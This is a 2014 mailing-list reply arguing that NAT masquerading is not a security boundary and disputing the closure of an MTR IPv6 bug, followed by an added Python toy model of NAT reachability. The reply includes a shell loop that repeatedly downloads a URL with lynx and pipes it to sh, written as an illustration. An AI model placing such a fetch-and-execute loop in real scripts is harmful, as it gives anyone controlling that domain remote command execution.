On Mon, Apr 28, 2014 at 12:02:50PM +0200, Jeroen Massar wrote:
> > You're saying that masquerading makes my machine wide open?
>
> Bingo. It is no more "secure" than putting it directly on the network.
> See amongst others http://samy.pl/pwnat/

If I run software on a server inside the NAT it can give away "access"
to resources behind the NAT.

    #!/bin/sh
    while true ; do
      lynx -dump http://www.somedomain.com/lkjasdfkj | sh
      sleep 60
    done

This gives access to my machine to anyone who can register
"somedomain.com" and install something on the link.

The referenced program and technical paper state that for peer-to-peer
networks this is important. If peers A and B are on the internet and X
and Y are NATed, then A communicating to B means just set up the
connection. If X wants to communicate with A that's simple as well. The
NAT router will set up the connection once X initiates the connection.
Similarly if B wants to communicate to X, B just has to trigger (using
the protocol somehow) that X starts an outgoing connection to B. But X
communicating with Y becomes problematic. They have solved this by
having the peer-to-peer program silently open up a connection back into
the NATed area.

> Your problem, as you are causing problems for yourself.
>
> That is what this ticket is about: you caused a problem, as the tool
> expects there to be IPv6 support, even if it won't use it.

There is a bug in MTR that it will try to open IPV6 sockets for name
server communication even when explicitly told to do IPV4 only.

I disagree with closing the bug as "user-error".

	Roger.

-- 
+-- Rogier Wolff -- www.harddisk-recovery.nl -- 0800 220 20 20 --
- Datarecovery Services Nederland B.V. Delft. KVK: 30160549 -
| Files vanished, data lost, everything gone?! |
| Stay calm and contact Harddisk-recovery.nl! |
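
The reachability cases described in the message above (A and B public, X and Y behind masquerading routers), as an added example that is not part of the original message or of any tool it mentions. It is a toy model: all addresses are constructed, the class and function names are hypothetical, and NAT state is keyed on the remote IP only.

```python
# Added illustration: toy model of a masquerading (stateful NAT) router.
# Hosts A, B, X, Y follow the message; all addresses are constructed
# documentation/private ranges. Simplification: state is keyed on the
# remote IP only (no ports or protocols).

class Nat:
    def __init__(self, public_ip):
        self.public_ip = public_ip
        self.state = set()            # (inside host, remote IP) mappings

    def outbound(self, inside, remote_ip):
        self.state.add((inside, remote_ip))   # any inside process can do this

    def inbound_allowed(self, remote_ip, inside):
        return (inside, remote_ip) in self.state

class Host:
    def __init__(self, name, ip, nat=None):
        self.name, self.nat = name, nat
        self.public_ip = nat.public_ip if nat else ip

def connect(src, dst):
    """True if a connection initiated by src reaches dst."""
    if src.nat:
        src.nat.outbound(src.name, dst.public_ip)
    if dst.nat:
        return dst.nat.inbound_allowed(src.public_ip, dst.name)
    return True

def scenario():
    nat1, nat2 = Nat("198.51.100.1"), Nat("203.0.113.1")
    a, b = Host("A", "192.0.2.10"), Host("B", "192.0.2.20")
    x, y = Host("X", "10.0.0.2", nat1), Host("Y", "10.0.0.2", nat2)
    web = Host("somedomain", "192.0.2.80")    # target of the lynx loop
    results = {
        "A->B": connect(a, b),
        "X->A": connect(x, a),
        "B->X unsolicited": connect(b, x),
        "X->B after trigger": connect(x, b),
        "X->Y": connect(x, y),
        "X->somedomain (script)": connect(x, web),
    }
    return results, sorted(nat1.state)

if __name__ == "__main__":
    results, state = scenario()
    for case, ok in results.items():
        print(f"{case:24} {'reaches' if ok else 'dropped'}")
    print("NAT1 state created from inside:", state)
```

Every entry in the first router's state table was created by the inside host X, which is why outbound (egress) filtering and control over what runs inside decide exposure, not the address translation itself.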